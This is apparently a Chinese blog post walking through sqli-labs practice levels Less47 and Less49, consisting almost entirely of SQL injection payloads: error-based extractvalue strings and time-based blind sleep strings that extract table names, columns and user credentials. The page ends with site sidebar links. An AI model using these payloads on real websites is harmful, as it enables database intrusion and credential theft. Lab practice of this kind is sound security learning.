当前位置:网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)
SQL注入 Less47(报错注入) 和Less49(时间盲注)
2022-07-31 02:27:00 【开心星人】
Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合order by 'rand()'
这条语句显然是执行不了的
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- 基于FPGA的图像实时采集
- AtCoder Beginner Contest 261 Partial Solution
- What level of software testing does it take to get a 9K job?
- 用户交互+格式化输出
- MPPT solar charge controller data collection - through the gateway acquisition capacity battery SOC battery voltage, wi-fi
- mysql view
- BAT can't sell "Medical Cloud": Hospitals flee, mountains stand, and there are rules
- Tower of Hanoi problem
- Intel's software and hardware optimization empowers Neusoft to accelerate the arrival of the era of smart medical care
- Drools basic introduction, introductory case, basic syntax
猜你喜欢
基于opencv实现人脸检测
经典链表OJ强训题——快慢双指针高效解法
Real-time image acquisition based on FPGA
Hanyuan Hi-Tech 8-channel HDMI integrated multi-service high-definition video optical transceiver 8-channel HDMI video + 8-channel two-way audio + 8-channel 485 data + 8-channel E1 + 32-channel teleph
vlan间路由+静态路由+NAT(PAT+静态NAT)综合实验
Basic introduction to ShardingJDBC
MPPT太阳能充放电控制器数据采集-通过网关采集电池电压容量电量SOC,wifi传输
coldfusion8 background scheduled tasks take shell
力扣刷题之爬楼梯(7/30)
关于 mysql8.0数据库中主键位id,使用replace插入id为0时,实际id插入后自增导致数据重复插入 的解决方法
随机推荐
图像处理技术的心酸史
The effective square of the test (one question of the day 7/29)
用户交互+格式化输出
Can an inexperienced college graduate switch to software testing?my real case
BAT can't sell "Medical Cloud": Hospitals flee, mountains stand, and there are rules
汉源高科8路HDMI综合多业务高清视频光端机8路HDMI视频+8路双向音频+8路485数据+8路E1+32路电话+4路千兆物理隔离网络
直播预告 | KDD2022博士论文奖冠亚军对话
Linux下redis7的安装,启动与停止
AI中的数学思想
ShardingJDBC usage summary
print task sorting js od huawei
PDF 拆分/合并
String为什么不可变?
[Map and Set] LeetCode & Niu Ke exercise
Maximum area of solar panel od js
Face detection based on opencv
Brute Force/Adjacency List Breadth First Directed Weighted Graph Undirected Weighted Graph
Arbitrum Interview | L2 Summer, what does the standout Arbitrum bring to developers?
My first understanding of MySql, and the basic syntax of DDL and DML and DQL in sql statements
Unity界面总体介绍